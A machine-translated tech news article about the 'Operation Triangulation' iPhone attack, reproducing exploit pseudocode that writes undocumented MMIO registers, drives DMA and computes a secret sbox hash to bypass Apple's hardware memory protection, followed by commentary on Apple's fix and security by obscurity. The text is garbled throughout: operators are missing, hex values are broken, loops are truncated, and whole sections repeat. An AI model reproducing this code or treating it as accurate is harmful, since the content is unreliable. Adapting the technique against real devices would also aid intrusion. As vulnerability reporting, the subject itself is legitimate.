New Zhiyuan Report
New Zhiyuan Report
[New Zhiyuan Introduction] iphone exposed the "most complex" hardware-level vulnerability in history! Hackers can obtain all sensitive data with just one iMessage, and users will not notice anything. The chain involved in the entire vulnerability was extremely complex, and Karpathy exclaimed: It is not something ordinary people can do.
In this regard, Karpathy believes that this is no longer the scope of individual behavior, but should be a national level behavior.
A netizen who claimed that he still uses a Palm phone replied: "This is the reason why I insist on using a Palm phone."
Some netizens even lamented: "If you successfully annoy someone with such technical capabilities and resources, People, maybe the last thing you need to worry about is the data in your phone."
"Operation Triangulation" attack chain
The mysterious vulnerability
Technical details
if (cpuid == 0x8765edea): # cpufamily_arm_everest_sawtooth (a16)
base = 0x23b700408
command = 0x1f0023ff
elif (cpuid == 0xda33d83d): # cpufamily_arm_avalanche_blizzard (a15)
base = 0x23b7003c8
command = 0x1f0023ff
elif (c puid == 0x1b588bb3): # cpufamily_arm_firestorm_icestorm (a14)
base = 0x23b7003d0
command = 0x1f0023ff
elif (cpuid == 0x462504d2): # cpufamily_arm_lightning_thunder (a13)
base = 0x23b080390
command = 0x1f0003ff
elif (cpuid == 0x07d34b9f): # cpufamily_arm_vortex_tempest (a12)
base = 0x23b080388
command = 0x1f0003ff
if ((~read_dword(base) 0xf) != 0):
write_dword(base, command)
while(true):
if ((~read_dword(base) 0xf) == 0):
break
def ml_dbgwrap_halt_cpu():
value = read_qword(0x206040000)
if ((value 0x90000000) != 0 ):
return
write_qword(0x206040000, value | 0x80000000)
while (true):
if ((read_qword(0x206 040000) 0x10000000) != 0):
break
def ml_dbgwrap_unhalt_cpu():
value = read_qword(0x206040000)
value = (value 0xffffffff2ffffffff) | 0x40000000
2write_qword(0x206040000, value) while (true):
if ((read_qword(0x206040000) 0x10000000) == 0):
break
New Zhiyuan Report
New Zhiyuan Report
[New Zhiyuan Introduction] iphone exposed the "most complex" hardware-level vulnerability in history! Hackers can obtain all sensitive data with just one iMessage, and users will not notice anything. The chain involved in the entire vulnerability was extremely complex, and Karpathy exclaimed: It is not something ordinary people can do.
In this regard, Karpathy believes that this is no longer the scope of individual behavior, but should be a national level behavior.
A netizen who claimed that he still uses a Palm phone replied: "This is the reason why I insist on using a Palm phone."
Some netizens even lamented: "If you successfully annoy someone with such technical capabilities and resources, People, maybe the last thing you need to worry about is the data in your phone."
"Operation Triangulation" attack chain
The mysterious vulnerability
Technical details
if (cpuid == 0x8765edea): # cpufamily_arm_everest_sawtooth (a16)
base = 0x23b700408
command = 0x1f0023ff
elif (cpuid == 0xda33d83d): # cpufamily_arm_avalanche_blizzard (a15)
base = 0x23b7003c8
command = 0x1f0023ff
elif (c puid == 0x1b588bb3): # cpufamily_arm_firestorm_icestorm (a14)
base = 0x23b7003d0
command = 0x1f0023ff
elif (cpuid == 0x462504d2): # cpufamily_arm_lightning_thunder (a13)
base = 0x23b080390
command = 0x1f0003ff
elif (cpuid == 0x07d34b9f): # cpufamily_arm_vortex_tempest (a12)
base = 0x23b080388
command = 0x1f0003ff
if ((~read_dword(base) 0xf) != 0):
write_dword(base, command)
while(true):
if ((~read_dword(base) 0xf) == 0):
break
def ml_dbgwrap_halt_cpu():
value = read_qword(0x206040000)
if ((value 0x90000000) != 0 ):
return
write_qword(0x206040000, value | 0x80000000)
while (true):
if ((read_qword(0x206 040000) 0x10000000) != 0):
break
def ml_dbgwrap_unhalt_cpu():
value = read_qword(0x206040000)
value = (value 0xffffffff2ffffffff) | 0x40000000
2write_qword(0x206040000, value) while (true):
if ((read_qword(0x206040000) 0x10000000) == 0):
break
def dma_ctrl_1():
ctrl = 0x206140108
value = read_qword(ctrl)
write_qword(ctrl , value | 0x8000000000000001)
sleep(1)
while ((~read_qword(ctrl) 0x8000000000000001) != 0):
sleep(1)
def dma_ctrl_2(flag):
ctrl = 0x206140008
value = read_qword(ctrl)
if (flag):
if ((value 0x1000000000000000) == 0):
value = value | 0x1000000000000000
write_qword(ctrl, value)
else:
if ((value 0x100000000000 0000) != 0):
value = value ~0x1000000000000000
write_qword(ctrl, value)
def dma_ctrl_3(value):
ctrl = 0x206140108
value = value | 0x8000000000000000
write_qword(ctrl, read_qword(ctrl) value)
while ((read_qword(ctrl) 0 x8000000000000001) != 0):
sleep(1)
def dma_init(original_value_0x206140108):
dma_ctrl_1()
dma_ctrl_2(false)
dma_ctrl_3(original_value_0x206140108)
3 def dma_done(original_value_0x206140108):
dma_ctrl_1()
dma_ctrl_2(true)
dma_ctrl_3(original_ value_0x206140108)
if (cpuid == 0x8765edea): # cpufamily_arm_everest_sawtooth (a16)
i = 8
mask = 0x7ffffff
elif (cpuid == 0xda33d83d): # cpufamily_arm_avalanche_blizzard (a15)
i = 8
mask = 0x3fffff
elif (cpuid == 0x1b588bb3): # cpufamily_arm_firestorm_icestorm (a14)
i = 0x28
mask = 0x3ffffff
elif (cpuid == 0x46250 4d2): # cpufamily_arm_lightning_thunder (a13)
i = 0x28
mask = 0x3ffffff
elif (cpuid == 0x07d34b9f): # cpufamily_arm_vortex_tempest (a12)
i = 0x28
mask = 0x3ffffff
dma_init(original_value_0x206140108)
hash1 = calculate_hash(data)
hash2 = calculate_hash(data+0x20)
hash2_write_ qword(0x206150040, 0x2000000 | (phys_addr 0x3fc0))
pos = 0
while (pos 0x40):
write_qword(0x206150048, read_qword(data + pos))
pos += 8
phys_addr_upper = ((((phys_addr 14) mask) 18) 0x3ffffffff ffff)
value = phys_addr_upper | (hash1 i) | (hash2 50) | 0x1f
write_qword( 0x206150048, value)
dma_done(original_value_0x206140108)
sbox = [
0x007, 0x00b, 0x00d, 0x013, 0x00e, 0x015, 0x01f, 0x016,
0x019, 0x023, 0x02f, 0x0 37, 0x04f, 0x01a, 0x025, 0x043,
0x03b, 0x057, 0x08f, 0x01c, 0x026, 0x029, 0x03d, 0x045 ,
0x05b, 0x083, 0x097, 0x03e, 0x05d, 0x09b, 0x067, 0x117,
0x02a, 0x031, 0x046, 0x049, 0x085, 0x103, 0x0 5e, 0x09d,
0x06b, 0x0a7, 0x11b, 0x217, 0x09e, 0x06d, 0x0ab, 0x0c7,
0x127 , 0x02c, 0x032, 0x04a, 0x051, 0x086, 0x089, 0x105,
0x203, 0x06e, 0x0ad, 0x12b, 0x147, 0x227, 0x034, 0x04c,
20x052, 0x076, 0x08a, 0x091, 0x0ae, 0x106, 0x109, 0x0d3, 0x12d, 0x205 , 0x22b, 0x247, 0x07a, 0x0d5, 0x153, 0x22d,
0x038, 0x054, 0x08c, 0x092, 0x061, 0x10a, 0x111, 0x206,
0x 209, 0x07c, 0x0ba, 0x0d6, 0x155, 0x193, 0x253, 0x28b,
0x307, 0x0bc, 0x0da , 0x156, 0x255, 0x293, 0x30b, 0x058,
0x094, 0x062, 0x10c, 0x112, 0x0a1, 0x20a, 0x211, 0x0dc,
0x196, 0x 199, 0x256, 0x165, 0x259, 0x263, 0x30d, 0x313,
0x098, 0x064, 0x114, 0x0a2 , 0x15c, 0x0ea, 0x20c, 0x0c1,
0x121, 0x212, 0x166, 0x19a, 0x299, 0x265, 0x2a3, 0x315,
0x0ec, 0x1a6, 0x29a , 0x266, 0x1a9, 0x269, 0x319, 0x2c3,
0x323, 0x068, 0x0a4, 0x118, 0x0c2 , 0x122, 0x214, 0x141,
0x221, 0x0f4, 0x16c, 0x1aa, 0x2a9, 0x325, 0x343, 0x0f8,
0x174, 0x1ac, 0x2aa, 0x32 6, 0x329, 0x345, 0x383, 0x070,
0x0a8, 0x0c4, 0x124, 0x218, 0x142, 0x222 , 0x181, 0x241,
0x178, 0x2ac, 0x32a, 0x2d1, 0x0b0, 0x0c8, 0x128, 0x144,
0x1b8, 0x224, 0x1d4, 0x182, 0x2 42, 0x2d2, 0x32c, 0x281,
0x351, 0x389, 0x1d8, 0x2d4, 0x352, 0x38a, 0x391 , 0x0d0,
0x130, 0x148, 0x228, 0x184, 0x244, 0x282, 0x301, 0x1e4,
0x2d8, 0x354, 0x38c, 0x392, 0x1e8, 0x 2e4, 0x358, 0x394,
0x362, 0x3a1, 0x150, 0x230, 0x188, 0x248, 0x284, 0x302 ,
0x1f0, 0x2e8, 0x364, 0x398, 0x3a2, 0x0e0, 0x190, 0x250,
0x2f0, 0x288, 0x368, 0x304, 0x3a4, 0x370, 0x3 a8, 0x3c4,
0x160, 0x290, 0x308, 0x3b0, 0x3c8, 0x3d0, 0x1a0, 0x260,
0x310 , 0x1c0, 0x2a0, 0x3e0, 0x2c0, 0x320, 0x340, 0x380
]
def calculate_hash(buffer):
acc = 0
for i in range(8):
pos = i * 4
value = read_dword(buffer + pos)
for j in range(32) ; as you can see this is a customization algorithm, the calculation of its hash value relies on a predefined sbox table (sbox table). He tried searching for it in the vast library of binaries, but found nothing.
You may have noticed that this hash is not particularly secure since it is only 20 bits (10 bits calculated twice), but as long as no one knows how to calculate and apply it, it is sufficient. This approach is best described as "security by obscurity." If an attacker is not using this hardware feature and there is no guidance in the firmware on how to use it, how could they possibly discover and exploit it? researchers did another test. He discovered that the m1 chip built into the mac also had this unknown hardware feature.Then, he conducted an experiment using the powerful m1n1 tool. This tool has a trace_range function that can track all accesses to the specified mmio register range. Use it to monitor activities in the memory range from 0x206110000 to 0x206400000, but the results show that macos does not use these registers. The GPU coprocessor involved this time appeared for the first time in Apple's SOC only recently. Researchers doubt this hardware feature had any purpose in previous retail firmware. Nonetheless, the possibility cannot be ruled out that it may have been accidentally leaked in a specific firmware update or release of the xnu source code and then removed. Researchers originally hoped to explore what was hidden in the second unknown area through the fix for this vulnerability in iOS 16.6. Eventually we did find out how Apple fixed the issue, but they made the fix deliberately hard to understand. Apple prevents this vulnerability from being exploited by adding the mmio ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 to pmap-io-ranges in the device tree. xnu uses the information here to determine whether to allow the mapping of certain physical addresses. All documented entries are labeled with a label name that clearly states the purpose of these memory ranges.
Example of entries stored in pmap-io-ranges Here, pcie refers to "peripheral component interconnect express", dart is "device address resolution table (device address resolution table)", dapf Stands for "device address filter", and so on. Listed below are the tag names of the exploited memory areas. These tags stand out in the list. Area entry for exploiting the vulnerability "Security by obscurity" is not safe
As you can see, this vulnerability is unusual. We don't know how the attacker learned to exploit this unknown hardware feature, nor what it was originally used to do. What. I'm not even sure if it was developed by Apple or if it's caused by a third-party component like arm coresight. But the vulnerability illustrates the fact that as long as there are hardware features that can bypass security protection, no matter how advanced hardware security measures are, they will become useless in the face of savvy attackers. Hardware security often relies on "security through obscurity". Compared with software, hardware is more difficult to reverse engineer and analyze. But this method itself is flawed, because all secrets will eventually be revealed. Systems that rely on "obscure security" for maintenance can never be truly secure. Reference: https://arstechnica.com/security/2023/12/exploit-used-in-mass-iphone-infection-campaign-targeted-secret-hardware-feature/
https://securelist.com/operation- triangulation-the-last-hardware-mystery/111669/
sbox = [
0x007, 0x00b, 0x00d, 0x013, 0x00e, 0x015, 0x01f, 0x016,
0x019, 0x023, 0x02f, 0x0 37, 0x04f, 0x01a, 0x025, 0x043,
0x03b, 0x057, 0x08f, 0x01c, 0x026, 0x029, 0x03d, 0x045 ,
0x05b, 0x083, 0x097, 0x03e, 0x05d, 0x09b, 0x067, 0x117,
0x02a, 0x031, 0x046, 0x049, 0x085, 0x103, 0x0 5e, 0x09d,
0x06b, 0x0a7, 0x11b, 0x217, 0x09e, 0x06d, 0x0ab, 0x0c7,
0x127 , 0x02c, 0x032, 0x04a, 0x051, 0x086, 0x089, 0x105,
0x203, 0x06e, 0x0ad, 0x12b, 0x147, 0x227, 0x034, 0x04c,
20x052, 0x076, 0x08a, 0x091, 0x0ae, 0x106, 0x109, 0x0d3, 0x12d, 0x205 , 0x22b, 0x247, 0x07a, 0x0d5, 0x153, 0x22d,
0x038, 0x054, 0x08c, 0x092, 0x061, 0x10a, 0x111, 0x206,
0x 209, 0x07c, 0x0ba, 0x0d6, 0x155, 0x193, 0x253, 0x28b,
0x307, 0x0bc, 0x0da , 0x156, 0x255, 0x293, 0x30b, 0x058,
0x094, 0x062, 0x10c, 0x112, 0x0a1, 0x20a, 0x211, 0x0dc,
0x196, 0x 199, 0x256, 0x165, 0x259, 0x263, 0x30d, 0x313,
0x098, 0x064, 0x114, 0x0a2 , 0x15c, 0x0ea, 0x20c, 0x0c1,
0x121, 0x212, 0x166, 0x19a, 0x299, 0x265, 0x2a3, 0x315,
0x0ec, 0x1a6, 0x29a , 0x266, 0x1a9, 0x269, 0x319, 0x2c3,
0x323, 0x068, 0x0a4, 0x118, 0x0c2 , 0x122, 0x214, 0x141,
0x221, 0x0f4, 0x16c, 0x1aa, 0x2a9, 0x325, 0x343, 0x0f8,
0x174, 0x1ac, 0x2aa, 0x32 6, 0x329, 0x345, 0x383, 0x070,
0x0a8, 0x0c4, 0x124, 0x218, 0x142, 0x222 , 0x181, 0x241,
0x178, 0x2ac, 0x32a, 0x2d1, 0x0b0, 0x0c8, 0x128, 0x144,
0x1b8, 0x224, 0x1d4, 0x182, 0x2 42, 0x2d2, 0x32c, 0x281,
0x351, 0x389, 0x1d8, 0x2d4, 0x352, 0x38a, 0x391 , 0x0d0,
0x130, 0x148, 0x228, 0x184, 0x244, 0x282, 0x301, 0x1e4,
0x2d8, 0x354, 0x38c, 0x392, 0x1e8, 0x 2e4, 0x358, 0x394,
0x362, 0x3a1, 0x150, 0x230, 0x188, 0x248, 0x284, 0x302 ,
0x1f0, 0x2e8, 0x364, 0x398, 0x3a2, 0x0e0, 0x190, 0x250,
0x2f0, 0x288, 0x368, 0x304, 0x3a4, 0x370, 0x3 a8, 0x3c4,
0x160, 0x290, 0x308, 0x3b0, 0x3c8, 0x3d0, 0x1a0, 0x260,
0x310 , 0x1c0, 0x2a0, 0x3e0, 0x2c0, 0x320, 0x340, 0x380
]
def calculate_hash(buffer):
acc = 0
for i in range(8):
pos = i * 4
value = read_dword(buffer + pos)
for j in range(32) ; as you can see this is a customization algorithm, the calculation of its hash value relies on a predefined sbox table (sbox table). He tried searching for it in the vast library of binaries, but found nothing.
You may have noticed that this hash is not particularly secure since it is only 20 bits (10 bits calculated twice), but as long as no one knows how to calculate and apply it, it is sufficient. This approach is best described as "security by obscurity." If an attacker is not using this hardware feature and there is no guidance in the firmware on how to use it, how could they possibly discover and exploit it? researchers did another test. He discovered that the m1 chip built into the mac also had this unknown hardware feature.Then, he conducted an experiment using the powerful m1n1 tool. This tool has a trace_range function that can track all accesses to the specified mmio register range. Use it to monitor activities in the memory range from 0x206110000 to 0x206400000, but the results show that macos does not use these registers. The GPU coprocessor involved this time appeared for the first time in Apple's SOC only recently. Researchers doubt this hardware feature had any purpose in previous retail firmware. Nonetheless, the possibility cannot be ruled out that it may have been accidentally leaked in a specific firmware update or release of the xnu source code and then removed. Researchers originally hoped to explore what was hidden in the second unknown area through the fix for this vulnerability in iOS 16.6. Eventually we did find out how Apple fixed the issue, but they made the fix deliberately hard to understand. Apple prevents this vulnerability from being exploited by adding the mmio ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 to pmap-io-ranges in the device tree. xnu uses the information here to determine whether to allow the mapping of certain physical addresses. All documented entries are labeled with a label name that clearly states the purpose of these memory ranges.
Example of entries stored in pmap-io-ranges Here, pcie refers to "peripheral component interconnect express", dart is "device address resolution table (device address resolution table)", dapf Stands for "device address filter", and so on. Listed below are the tag names of the exploited memory areas. These tags stand out in the list. Area entry for exploiting the vulnerability "Security by obscurity" is not safe
As you can see, this vulnerability is unusual. We don't know how the attacker learned to exploit this unknown hardware feature, nor what it was originally used to do. What. I'm not even sure if it was developed by Apple or if it's caused by a third-party component like arm coresight. But the vulnerability illustrates the fact that as long as there are hardware features that can bypass security protection, no matter how advanced hardware security measures are, they will become useless in the face of savvy attackers. Hardware security often relies on "security through obscurity". Compared with software, hardware is more difficult to reverse engineer and analyze. But this method itself is flawed, because all secrets will eventually be revealed. Systems that rely on "obscure security" for maintenance can never be truly secure. Reference: https://arstechnica.com/security/2023/12/exploit-used-in-mass-iphone-infection-campaign-targeted-secret-hardware-feature/
https://securelist.com/operation- triangulation-the-last-hardware-mystery/111669/